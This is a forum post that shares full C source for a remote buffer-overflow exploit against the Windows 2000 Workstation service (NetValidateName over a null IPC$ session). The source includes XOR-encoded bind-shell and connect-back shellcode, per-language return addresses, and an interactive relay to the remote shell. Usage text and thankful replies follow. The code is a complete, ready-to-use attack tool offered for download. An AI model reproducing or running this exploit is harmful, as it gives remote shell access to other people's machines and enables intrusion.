Full Version: O_wks3.c
101

/*
*  Author: snooq [http://www.angelfire.com/linux/snooq/]        
*  Date: 15 November 2003  
*
*  ++++++++++ THIS IS YET ANOTHER PRIVATE VERSION ++++++++++
*
*  Another version........ slightly different from the one
*  on packetstorm & k-otik........ =p
*
*  I've changed the shellcode a bit... ExitThread() instead
*  of ExitProcess()..... it doesn't crash now.. :)
*
*  Also, added an option for u to specify a XOR key to be
*  used in encoding the payload....
*
*  This should be the final release....I dun think I'm gonna
*  improve this further...
*
*  Lastly.. let me iterate this again....
*  This code will only work against Win2K that was configured
*  to grant 'anonymous logon' write access to the log file...
*  [NB: win2k(on ntfs), by default, don't...]
*
*  Using this against XP will likely fail....
*  but if u manage to adapt this code to work for XP too..
*  pleaseeeee.. send me a copy tooo.... =)
*
*  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
*/
#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"msvcrt")
#pragma comment (lib,"mpr")
#pragma comment (lib,"user32")
#pragma warning (disable:4013)

#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <lm.h>

#define NOP  0x90
#define PORT  24876
#define CODE_OFFSET 32
#define KEY_OFFSET 13
#define KEY  0x99999999

#define ALIGN  1 // Between 0 ~ 3
#define TARGET  1
#define INTERVAL 3
#define TIME_OUT 20
#define HEX_LEN  16
#define PORT_OFFSET_1 198
#define PORT_OFFSET_2 193
#define IP_OFFSET 186
#define SC_OFFSET 20 // Gap for some NOPs...
#define RET_SIZE 2026 // Big enuff to take EIP...;)

#define SC_SIZE_1 sizeof(bindport)
#define SC_SIZE_2 sizeof(connback)

#define BSIZE 2600
#define SSIZE 128

/* getopt() is declared here as returning char; POSIX getopt returns int and
 * signals end-of-options with -1 (EOF). main() compares this char result
 * against EOF, which only matches where plain char is signed — NOTE(review):
 * true of the MSVC/x86 build this targets, not of C in general. */
extern char getopt(int,char **,char*);
extern char *optarg;
/* Read by setalarm()'s message loop; nothing in this file assigns it, so that
 * loop only ends when the timer callback calls err_exit(). */
static int alarm_fired=0;

HMODULE hMod;    /* netapi32.dll handle, loaded in sendstr() */
FARPROC fxn;     /* NetValidateName entry point resolved from hMod */
HANDLE t1, t2;   /* sender thread / alarm thread, started in do_send() */

char buff[BSIZE];   /* request buffer: filled by main(), passed on by sendstr() */

/* Per-target parameters. 'os' is the label showtargets() prints, 'jmpesp' is
 * the address main() repeats across buff[] (per the 'dll' field, taken from
 * the named user32.dll build), and 'dll' records that build. 'v' is a spare
 * instance whose sizeof showtargets() uses to compute the element count. */
struct {
char *os;
long jmpesp;
char *dll;
}

targets[] = {
{
 "Window 2000 (en) SP4",
 0x77e14c29,
 "user32.dll 5.0.2195.6688"
},
{
 "Window 2000 (en) SP1",
 0x77e3cb4c,
 "user32.dll 5.0.2195.1600"
},
{
 "Window 2000 (ru) SP3", // Thanks sherry for this..
 0x77e2afc5,
 "user32.dll 5.0.2195.4314"
},
{
 "Window 2000 (ru) SP4", // Thanks 0x90 for this..
 0x793bedbb,
 "user32.dll 5.0.2195.6688"
},
{
 "For debugging only",
 0x41424344,
 "dummy.dll 5.0.2195.1600"
}
}, v;

/*
* HD Moore's shellcode.....;)
* Modified to use ExitThread() instead of ExitProcess()... =p
*/

char bindport[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86"
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc"
"\x3b\x8e\x4e\x0e\xec\xef\xce\xe0\x60\xad\xd9\x05\xce\x72\xfe\xb3"
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89"
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59"
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06"
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e"
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff"
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31"
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55"
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81"
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6"
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff"
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x08\x00";

char connback[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\xef\xce\xe0"
"\x60\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02"
"\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44"
"\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe"
"\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d"
"\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00"
"\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24"
"\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b"
"\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb"
"\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0"
"\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b"
"\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b"
"\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

/* Report a fatal condition on stdout and terminate. puts() supplies the
 * newline the message lacks. Note the exit status is 0 even on failure. */
void err_exit(char *s) {
    puts(s);
    exit(0);
}

/* Hex-digit lookup used by str2long(): upper-case digit characters and their
 * values, in ascending order. str2long() matches lower-case letters by adding
 * 32 to 'chr'. 'map' is a spare instance; nothing visible in this file reads it. */
struct {
    char chr;
    int value;
}
CHexMap[] = {
    {'0', 0},
    {'1', 1},
    {'2', 2},
    {'3', 3},
    {'4', 4},
    {'5', 5},
    {'6', 6},
    {'7', 7},
    {'8', 8},
    {'9', 9},
    {'A', 10},
    {'B', 11},
    {'C', 12},
    {'D', 13},
    {'E', 14},
    {'F', 15}
}, map;

/*
* This is based on code posted to codeproject
* by Anders Molin.....;)
*/

/* Parse a hexadecimal string (optional 0x/0X prefix, either letter case)
 * into a long. Parsing stops silently at the first non-hex character, so
 * "12zz" yields 0x12 and "" yields 0. More than HEX_LEN digits after the
 * prefix is rejected through err_exit(). Overflow beyond the width of long
 * is not detected; the shifts simply run off the top. */
long str2long(char *s) {
    long acc = 0;
    int n = (int)strlen(s);

    /* Strip an optional 0x / 0X prefix. */
    if (s[0] == '0' && (s[1] == 'X' || s[1] == 'x')) {
        s += 2;
        n -= 2;
    }

    if (n > HEX_LEN) err_exit("-> Invalid key...");

    for (; *s != '\0'; s++) {
        int k;
        /* Upper-case entry, or its lower-case form (chr + 32). */
        for (k = 0; k < HEX_LEN; k++) {
            if (*s == CHexMap[k].chr || *s == CHexMap[k].chr + 32) break;
        }
        if (k == HEX_LEN) break;   /* first non-hex character ends the parse */
        acc = (acc << 4) | CHexMap[k].value;
    }
    return acc;
}


/*
* Ripped from TESO code and modifed by ey4s for win32
* and... lamer quoted it wholesale here..... =p
*/

/*
 * Interactive relay between this console and the remote shell's socket.
 * Each pass waits up to one second for socket data; if some arrives it is
 * copied to stdout (fd 1), otherwise one read() from stdin (fd 0) is sent
 * to the socket. The loop never returns: every error path calls err_exit().
 *
 * sock: a connected socket (main() passes the accept()/connect() result).
 */
void doshell(int sock) {
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

/* One-second select() timeout; on time-out the loop falls through to the
 * blocking read() on the console. */
time.tv_sec=1;
time.tv_usec=0;

while (1) {
 /* A Winsock fd_set built by hand: fd_count=1, fd_array[0]=sock. This
  * depends on the Winsock fd_set layout and on the socket value fitting an
  * unsigned long; it is refilled each pass because select() may rewrite it. */
 ul[0]=1;
 ul[1]=sock;

 /* Anything other than "1 ready" — including a select() error — takes the
  * console branch. */
 l=select(0,(fd_set *)&ul,NULL,NULL,&time);
 if(l==1) {
  /* recv() returns 0 on orderly close and SOCKET_ERROR on failure. */
  l=recv(sock,buf,sizeof(buf),0);
  if (l<=0) {
   err_exit("-> Connection closed...");
  }
  l=write(1,buf,l);
  if (l<=0) {
   err_exit("-> Connection closed...");
  }
 }
 else {
  /* Blocks until the user enters input; EOF on stdin also ends the run. */
  l=read(0,buf,sizeof(buf));
  if (l<=0) {
   err_exit("-> Connection closed...");
  }
  l=send(sock,buf,l,0);
  if (l<=0) {
   err_exit("-> Connection closed...");
  }
 }
}
}

/*
 * Pick a local IPv4 address for the connect-back payload, as dotted text.
 *
 * e: non-zero walks every address of the local host name and asks
 *    "[y/n]" on the console for each; zero returns the first address.
 * Returns a pointer to inet_ntoa()'s static buffer, which the next inet_ntoa
 * call overwrites. Every failure path calls err_exit(), so the trailing
 * 'return NULL' is never reached in practice.
 */
char *getmyip(int e) {
int i;
char ac[SSIZE];
struct in_addr addr;
struct hostent *phe;

if (gethostname(ac, sizeof(ac))==SOCKET_ERROR) {
 err_exit("-> Couldn't get local hostname...");
}

phe=gethostbyname(ac);

if (phe==0) {
        err_exit("-> Hostname lookup error...");
}

if (e) {
 for (i=0; phe->h_addr_list[i]!=0; ++i) {
  memcpy(&addr, phe->h_addr_list[i], sizeof(struct in_addr));
  printf("-> Use %s as local IP? [y/n]\n",inet_ntoa(addr));
  /* NOTE(review): getch() is called twice when the first key is not 'y',
   * so an upper-case 'Y' only counts if it is the *second* key pressed;
   * any other pair of keys moves on to the next address. */
  if (getch()=='y' || getch()=='Y') return inet_ntoa(addr);
 }
 err_exit("-> Couldn't find local IP??? Try '-i' switch...\n");
}
else {
 /* h_addr_list[0] is assumed present once gethostbyname() succeeded. */
 memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
 return inet_ntoa(addr);
}

return NULL;
}


/* Patch the connect-back payload's IPv4 address in place: the 4-byte
 * network-order value from inet_addr() is stored at connback+IP_OFFSET
 * through a long*. Besides byte order this also relies on unaligned access
 * and on type-punning a char array, which is only safe on the x86/MSVC build
 * this was written for. 'ip' is not validated; inet_addr() returns
 * INADDR_NONE for malformed input and that value is stored as-is. */
void changeip(char *ip) {
char *ptr;
ptr=connback+IP_OFFSET;
/* Assume Little-Endianess.... */
*((long *)ptr)=inet_addr(ip);
}

/* Store 'port' as two big-endian (network-order) bytes at code[offset] and
 * code[offset+1]. Callers pass a payload buffer and the offset of its port
 * field; no bounds check is performed. */
void changeport(char *code, int port, int offset) {
    unsigned char *dst = (unsigned char *)code + offset;
    dst[0] = (unsigned char)(port >> 8);
    dst[1] = (unsigned char)port;
}

/* Two-line program banner, printed ahead of usage(), showtargets() and the
 * run log. Output goes to stdout like the rest of the tool's messages. */
void banner() {
    fputs("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n", stdout);
    fputs("\nPorted to WIN32 by class101 [class101@phreaker.net]\n\n", stdout);
}

/* Print the banner and the option summary, then exit (status 0).
 * s: argv[0], shown in the "Usage:" line. */
void usage(char *s) {
    static const char *lines[] = {
        "\t-r\tSize of 'return addresses'\n",
        "\t-a\tAlignment size [0~3]\n",
        "\t-p\tPort to bind shell to (in 'connecting' mode), or\n",
        "\t\tPort for shell to connect back (in 'listening' mode)\n",
        "\t-s\tShellcode offset from the return address\n",
        "\t-t\tTarget types. ( -H for more info )\n",
        "\t\tDefault is '-t 1'\n",
        "\t-H\tShow list of possible targets\n",
        "\t-l\tListening for shell connecting\n",
        "\t\tback to port specified by '-p' switch\n",
        "\t-i\tIP for shell to connect back.\n",
        "\t\tIf '-i' is not present, the first local IP is used.\n",
        "\t-e\tEnumerate local IPs interactively. ('listening' mode only)\n",
        "\t-I\tTime interval between each trial ('connecting' mode only)\n",
        "\t-T\tTime out (in number of seconds)\n",
        "\t-k/-K\tXOR key, e.g '-k 43452352' or '-K 0xabcd9897'\n",
        "\t-h\tTarget's IP. <<< THIS IS MANDATORY >>>\n\n"
    };
    size_t k;

    banner();
    printf("Usage: %s [options]\n\n", s);
    /* None of the lines contain conversions, so fputs() and printf() agree. */
    for (k = 0; k < sizeof(lines) / sizeof(lines[0]); k++) {
        fputs(lines[k], stdout);
    }
    exit(0);
}

/* List every entry of targets[] (1-based index, label, address, DLL build)
 * after the banner, then exit (status 0). The element count is derived from
 * sizeof(v), the spare instance of the same anonymous struct type. */
void showtargets() {
    size_t count = sizeof(targets) / sizeof(v);
    size_t k;

    banner();
    fputs("Possible targets are:\n", stdout);
    fputs("=====================\n", stdout);
    for (k = 0; k < count; k++) {
        printf("%d) %s --> 0x%08x (%s)\n", (int)k + 1, targets[k].os,
               (unsigned)targets[k].jmpesp, targets[k].dll);
    }
    exit(0);
}

/*
 * Deliver the buffer: open an anonymous ("null") session to the target's
 * IPC$ share, then call NetValidateName with buff[] (BSIZE bytes, filled by
 * main()) as the name argument. Runs on the thread started by do_send().
 *
 * From a defender's view the observable sequence is a WNetAddConnection2
 * with empty user name and password to \\host\ipc$, followed by a
 * Workstation-service NetValidateName call whose name argument is far
 * longer than any legitimate machine name; both can be audited on the
 * target. Per the file header, the author expects this to matter only when
 * anonymous logon has write access to the service's log file.
 *
 * host: dotted IP or host name as given to '-h'.
 */
void sendstr(char *host) {

WCHAR wStr[SSIZE];
char ipc[SSIZE], hStr[SSIZE];

DWORD ret;
NETRESOURCE NET;

/* NetValidateName is resolved at run time; netapi32 is not among the
 * #pragma comment(lib) entries at the top of the file.
 * NOTE(review): neither hMod nor fxn is checked for NULL before use. */
hMod=LoadLibrary("netapi32.dll");
fxn=GetProcAddress(hMod,"NetValidateName");

/* _snprintf does not NUL-terminate when output is cut at SSIZE-1 bytes, and
 * nothing terminates ipc[]/hStr[] explicitly afterwards. */
_snprintf(ipc,SSIZE-1,"\\\\%s\\ipc$",host);
_snprintf(hStr,SSIZE-1,"\\\\%s",host);
MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));

NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;   /* "\\host\ipc$" */

printf("-> Setting up $IPC session...(aka 'null session')\n");
/* Arguments: resource, password "", user name "", flags 0. */
ret=WNetAddConnection2(&NET,"","",0);

if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
else printf("-> IPC$ session setup successfully...\n");

printf("-> Sending exploit string...\n");

/* lpServer=wStr, lpName=buff. 'ret' is never examined after this call; the
 * outcome is judged solely by whether a shell connects in main(). */
ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);

}

/* Timer callback installed by setalarm(): the deadline passed, so end the
 * whole process via err_exit(). All four parameters are unused. */
VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime) {
    (void)hwnd;
    (void)uMsg;
    (void)idEvent;
    (void)dwTime;
    err_exit("-> I give up...dude.....");
}

/*
 * Watchdog, run on its own thread (see do_send()): arm a Win32 timer for
 * 'timeout' seconds and pump messages until it fires. alarm_fired is never
 * assigned anywhere in this file, so the loop ends only when alrm_bell()
 * calls err_exit() (terminating the process) or when resetalarm() kills
 * this thread from outside.
 *
 * timeout: seconds to wait. It arrives through _beginthread's void* argument,
 *          into which do_send() passes an int by value.
 */
void setalarm(int timeout) {

MSG msg = { 0, 0, 0, 0 };
/* hWnd=0 makes this a thread timer: WM_TIMER lands in this thread's queue and
 * DispatchMessage() invokes alrm_bell. SetTimer's return value (0 on failure)
 * is not checked. */
SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);

while(!alarm_fired) {
 if (GetMessage(&msg, 0, 0, 0) ) {
  if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
  DispatchMessage(&msg);
 }
}

}

/* Stop both worker threads once a shell connection is in hand: the alarm
 * thread (t2) first, then the sender thread (t1). TerminateThread() kills a
 * thread without unwinding it; a failed kill ends the process via err_exit(),
 * so the second thread is only touched if the first kill succeeded. */
void resetalarm() {
    HANDLE victims[2] = { t2, t1 };
    char *failure_msgs[2] = {
        "-> Failed to reset alarm...",
        "-> Failed to kill the 'sending' thread..."
    };
    int k;

    for (k = 0; k < 2; k++) {
        if (!TerminateThread(victims[k], 0)) {
            err_exit(failure_msgs[k]);
        }
    }
}

/*
 * Start the two worker threads: t1 runs sendstr(host), t2 runs
 * setalarm(timeout). main() later tears both down with resetalarm().
 *
 * Both _beginthread calls pass functions whose parameter is not void*
 * (char* and int respectively), and 'timeout' is handed over as the void*
 * argument by value; this relies on the compiler accepting the mismatched
 * pointer types and on int and pointer being interchangeable on Win32/x86.
 * NOTE(review): _beginthread reports failure with -1L, not 0, so the ==0
 * checks below would not detect a thread that failed to start.
 */
void do_send(char *host,int timeout) {
t1=(HANDLE)_beginthread(sendstr,0,host);
if (t1==0) { err_exit("-> Failed to send exploit string..."); }
t2=(HANDLE)_beginthread(setalarm,0,timeout);
if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}

unsigned char b[4];   /* scratch output of get_bytes(), inspected by XORcode() */

/* Split 'word' into its four bytes, least-significant first, into b[].
 * Right-shifting a negative long is implementation-defined, but only the
 * low 8 bits of each shifted value are kept. */
void get_bytes(long word) {
    int k;
    for (k = 0; k < 4; k++) {
        b[k] = (unsigned char)((word >> (8 * k)) & 0xff);
    }
}

/*
 * Encode the selected payload in place: store 'key' into the payload at
 * KEY_OFFSET (where the default KEY bytes sit), XOR every 4-byte word from
 * CODE_OFFSET onward with it, and refuse any key that leaves a zero byte in
 * the encoded body.
 *
 * mode: 0 encodes bindport, non-zero encodes connback (main()'s -l flag).
 * key:  32-bit XOR key from -k/-K; echoed to stdout before use.
 *
 * NOTE(review): 'len' is the array's sizeof, which counts the string
 * literal's terminating NUL. So code[len-1] is that NUL, '*(code+len)=0'
 * writes one byte past the array, and because the loop advances four bytes
 * per step while (len-CODE_OFFSET) need not be a multiple of four, the last
 * iteration can read and write past the end as well.
 */
void XORcode(int mode,long key) {
char *ptr, *code;
long tmp;
int i, j, len;

if (mode) {
 len=SC_SIZE_2;
 code=connback;
}
else {
 len=SC_SIZE_1;
 code=bindport;
}

/* %08x with a long argument: same width on the 32-bit target. */
printf("-> XORing payload with key -> 0x%08x....\n",key);

/* Unaligned long stores through a char* — x86-only type punning. */
ptr=code+KEY_OFFSET;
*((long *)ptr)=key;
ptr=code+CODE_OFFSET;
for(i=0;i<(len-CODE_OFFSET);i+=4) {
 tmp=*((long *)ptr);
 *((long *)ptr)=tmp^key;
 /* Reject a key that produces a zero byte anywhere in the encoded word. */
 get_bytes(tmp^key);
 for(j=0;j<4;j++) {
  if (b[j]=='\0') err_exit("-> Payload has 'null'. Try another key..=p");
 }
 ptr+=4;
}
*(code+len)=0;
}

/*
 * Entry point: parse options, build the request buffer, start the sender
 * and watchdog threads, then either wait for the payload to connect back
 * (-l) or poll the target's bind port, and finally hand the socket to
 * doshell().
 *
 * Layout written into buff[] (BSIZE bytes, pre-filled with NOP):
 *   buff[align .. align+retsize)           repeated 'retaddr'
 *   buff[retsize+sc_offset .. +scsize)     the encoded payload
 * Only the second range is checked against BSIZE, and only after the first
 * has already been written; a large -r or -a therefore overruns buff[].
 *
 * Returns 0; every failure path calls err_exit(), which also exits with 0.
 */
int main(int argc, char *argv[]) {

char opt;                      /* getopt() result; see the extern declaration above */
char *host, *ptr, *ip="";      /* host is only set by -h; usage() exits otherwise */
struct sockaddr_in sockadd;
int i, i_len, ok=0, mode=0, flag=0, enum_ip=0;
int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
int target=TARGET, scsize=SC_SIZE_1, port=PORT;
int timeout=TIME_OUT, interval=INTERVAL;
/* NOTE(review): retaddr is only assigned in the 't' case below. Without
 * '-t' on the command line it is read uninitialized by the fill loop,
 * even though 'target' itself defaults to TARGET. */
long retaddr, key=KEY;

WSADATA wsd;
SOCKET s1, s2;

if (argc<2) { usage(argv[0]); }

/* a,i,I,r,s,h,k,K,t,T,p take an argument; H,l,e are flags. The loop ends
 * when getopt returns EOF (-1); see the note at the extern declaration. */
while ((opt=getopt(argc,argv,"a:i:I:r:s:h:k:K:t:T:p:Hle"))!=EOF) {
 switch(opt) {
  case 'a':
  align=atoi(optarg);   /* documented range 0~3, not enforced */
  break;

  case 'I':
  interval=atoi(optarg);
  break;

  case 'T':
  timeout=atoi(optarg);
  break;

  case 't':
  target=atoi(optarg);
  /* No range check: target-1 indexes targets[] directly. */
  retaddr=targets[target-1].jmpesp;
  break;

  case 'i':
  ip=optarg;
  break;

  case 'k':
  key=atol(optarg);       /* decimal key */
  break;

  case 'K':
  key=str2long(optarg);   /* hex key, optional 0x prefix */
  break;

  case 'l':
  mode=1;                 /* listening mode: use the connect-back payload */
  scsize=SC_SIZE_2;
  break;

  case 'e':
  enum_ip=1;
  break;

  case 'r':
  retsize=atoi(optarg);
  break;

  case 's':
  sc_offset=atoi(optarg);
  break;

  case 'h':
  ok=1;
  host=optarg;
  /* inet_addr() only: a host *name* here yields INADDR_NONE. */
  sockadd.sin_addr.s_addr=inet_addr(optarg);
  break;

  case 'p':
  port=atoi(optarg);
  break;

  case 'H':
  showtargets();
  break;

  default:
  usage(argv[0]);
  break;
 }
}

/* -h is mandatory; -e requires -l; -e without -i also fails this check.
 * NOTE(review): with -e and -i both given, the getmyip() call below is
 * skipped because ip is non-empty, so getmyip(1) is never reached. */
if (!ok||((enum_ip)&&(!mode))||((enum_ip)&&(strcmp(ip,"")==0))) { usage(argv[0]); }

/* NOP fill first, then the return-address run starting at 'align' (shifts
 * the 4-byte pattern's alignment). No bound check on align+retsize. */
memset(buff,NOP,BSIZE);

ptr=buff+align;
for(i=0;i<retsize;i+=4) {
 *((long *)ptr)=retaddr;
 ptr+=4;
}

if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
 err_exit("-> WSAStartup error....");
}

/* NOTE(review): SOCKET is an unsigned type on Win32, so '<0' can never be
 * true here or at accept() below; the documented failure value is
 * INVALID_SOCKET. */
if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
 err_exit("-> socket() error...");
}
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons((SHORT)port);

ptr=buff+retsize+sc_offset;

/* Payload placement check; note it comes after the fill loop above. */
if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

banner();

if (mode) {
 /* Listening mode: patch IP and port into connback, encode, copy into buff,
  * send, then accept the payload's connection on 'port'. */

 printf("-> 'Listening' mode...( port: %d )\n",port);

 if (strcmp(ip,"")==0) {
  /* ip now points at inet_ntoa()'s static buffer. */
  ip=getmyip(enum_ip);
  if (strcmp(ip,"")==0) err_exit("-> Couldn't figure out local IP. Use '-i' switch...");
 }

 printf("-> Using local IP: %s\n",ip);

 changeip(ip);
 changeport(connback, port, PORT_OFFSET_2);
 XORcode(mode,key);

 for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

 do_send(host,timeout);
 Sleep(1000);   /* give the sender thread a head start before bind() */

 /* sockadd is reused: the target address from -h is replaced by INADDR_ANY
  * for the local listener. */
 sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
 i_len=sizeof(sockadd);

 if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
  err_exit("-> bind() error...");
 }

 if (listen(s1,0)<0) {   /* minimal backlog */
  err_exit("-> listen() error...");
 }

 printf("-> Waiting for connection...\n");

 /* Blocks until something connects or the alarm thread ends the process. */
 s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

 if (s2<0) {
  err_exit("-> accept() error...");
 }

 /* No check that the peer is the target: any connection to 'port' is taken. */
 printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

 resetalarm();
 doshell(s2);

}
else {
 /* Connecting mode: patch the bind port into bindport, encode, copy into
  * buff, send, then retry connect() to host:port every 'interval' seconds. */

 /* NOTE(review): surplus 'port' argument — the format has no conversion. */
 printf("-> 'Connecting' mode...\n",port);

 changeport(bindport, port, PORT_OFFSET_1);
 XORcode(mode,key);
 for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

 do_send(host,timeout);
 Sleep(1000);   /* give the sender thread a head start */

 printf("-> Will try connecting to shell now....\n");

 i=0;
 /* Unbounded retry; only the alarm thread (-T) ends a run that never connects. */
 while(!flag) {
  Sleep(interval*1000);
  if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
   printf("-> Trial #%d....\n",i++);
  }
  else { flag=1; }
 }

 printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

 resetalarm();
 doshell(s1);

}

return 0;

}


NB:
-The Win32 version needs msvcr71.dll to run
-Exploit is detected by some lame antivirus like Norton, "for all the ppz who dunno how work this lame antivirus"...
-I'll not reply to your questions always like , "how this work?" "how you compiled it ?" "how to scan it?" "how to ?" just dl it & shut up.

Usage:


C:\WINNT\system32>o_wks3

WKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]

Ported to WIN32 by class101 [class101@phreaker.net]

Usage: o_wks3 [options]

-r Size of 'return addresses'
-a Alignment size [0~3]
-p Port to bind shell to (in 'connecting' mode), or
 Port for shell to connect back (in 'listening' mode)
-s Shellcode offset from the return address
-t Target types. ( -H for more info )
 Default is '-t 1'
-H Show list of possible targets
-l Listening for shell connecting
 back to port specified by '-p' switch
-i IP for shell to connect back.
 If '-i' is not present, the first local IP is used.
-e Enumerate local IPs interactively. ('listening' mode only)
-I Time interval between each trial ('connecting' mode only)
-T Time out (in number of seconds)
-k/-K XOR key, e.g '-k 43452352' or '-K 0xabcd9897'
-h Target's IP. <<< THIS IS MANDATORY >>>



bye
MichT
Thx a lot man i'll test it now biggrin.gif

ps:sorry for my english rolleyes.gif
liquidSilver
Hmm.. dry.gif
Double-=V=-
Thanks man, very sweet cool.gif
haxor2k3
Nice will have a look at this
DarkieD
pretty old wink.gif
Kynroxes
yeah man tks a lot !!
virus
its an html file blink.gif ..... when I right click-> Save As ... it saves it as an html doc ????
101


o_O dunno what happened, attachement wasnt working, fixed now.
teest
I'm testing now! thx smile.gif
Flinston
biggrin.gif that's great =)

mucho thanks for it ph34r.gif

